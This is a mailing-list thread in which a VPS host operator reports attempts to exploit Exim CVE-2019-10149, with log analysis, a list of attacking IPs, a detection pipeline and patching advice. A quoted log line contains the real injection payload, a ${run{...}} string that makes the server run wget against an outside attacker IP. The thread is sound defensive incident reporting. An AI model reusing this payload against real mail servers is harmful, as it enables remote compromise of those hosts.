I have just read up on this, after seeing this email. It appears that over 90% of exim4 servers are running vulnerable unpatched versions of the software. It also seems that the malware involved also sets up a cron job under user root to go on downloading other nasty stuff.
It seems that the best preventative step is to ensure that your exim is up to date running version >= 4.92. The only cure That I can see in the sites I have looked at is a complete nuking and format. This is a nasty brute

On Sun, 23 Jun 2019 at 04:25, Andy Smith <andy@bitfolk.com> wrote:
Hello,

I've just ran a grep on all of my mail logs for the string "run{" to
see who's been trying to exploit CVE-2019-10149. A successful match
looks like this on my MTA (Exim):

2019-06-19 14:57:19 H=li810-176.members.linode.com (service.com) [104.237.134.176] F=<support@service.com> rejected RCPT <root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x2064.50.180.45\x2ftmp\x2f85.119.82.70\x22}}@mail.bitfolk.com>: Unrouteable address

This appears to be attempting to execute:

    sh -c "wget 64.50.180.45/tmp/85.119.82.70

on my host. I assume that the attacker watches their HTTP logs for
requests for /tmp/85.119.82.70 and then they know they've found an
exploitable host.

Here's a list of offenders sorted by attempt count:

Count  Attacker                                       Country AS
-------------------------------------------------------------------------------------------------
   18  89.248.171.57   ( scanner20.openportstats.com) NL      INT-NETWORK, SC [AS202425]
    8  163.172.157.143 (143-157-172-163.rev.cloud.scaleway.com) GB      AS12876, FR [AS12876]
    6  104.237.134.176 (li810-176.members.linode.com) US      LINODE-AP Linode, LLC, US [AS63949]
    3  149.56.142.192  (       192.ip-149-56-142.net) CA      OVH, FR    [AS16276]
    3  104.200.137.239 (        mx239.odesktrack.com) US      TOTAL-SERVER-SOLUTIONS - Total Server Solutions L.L.C., US [AS46562]
    2  27.69.172.229   (                   localhost) VN      VIETEL-AS-AP Viettel Group, VN [AS7552]
    1  95.139.230.110  (node-110-230-139-95.domolink.tula.net) RU      ROSTELECOM-AS, RU [AS12389]
    1  79.173.123.131  (           Unset reverse DNS) RU      TKTOR, RU  [AS44270]
    1  46.150.228.178  (           Unset reverse DNS) RU      ABRIKOS-AS, RU [AS196768]
    1  27.70.156.161   (                   localhost) VN      VIETEL-AS-AP Viettel Group, VN [AS7552]
    1  27.69.172.239   (                   localhost) VN      VIETEL-AS-AP Viettel Group, VN [AS7552]
    1  27.69.172.214   (                   localhost) VN      VIETEL-AS-AP Viettel Group, VN [AS7552]

Most worrying, a BitFolk IP was amongst my findings. i.e. there is a
BitFolk customer VPS also doing this. Most likely they have already
been compromised by this technique. I've removed them from the
results above but I expect if you search your own logs you'll find
them. They have already been notified.

I created the above output with this script:

https://gist.github.com/grifferz/f92a9c885443a0db8776c4f2f10f914f

To use it in this case would be something like:

$ zcat -f /var/log/exim4/mainlog* \
    | grep "run{" \
    | awk -F'[' '{ gsub(/\].*/, "", $2); print $2 }' \
    | sort | uniq -c | sort -rn | ~/attackers.sh

The awk is separating an IP address out of the [1.2.3.4]. The
sort/uniq/sort is generating an event count. attackers.sh is merely
getting extra info about the IP address.

Cheers,
Andy

--
https://bitfolk.com/ -- No-nonsense VPS hosting
_______________________________________________
users mailing list
users@lists.bitfolk.com
https://lists.bitfolk.com/mailman/listinfo/users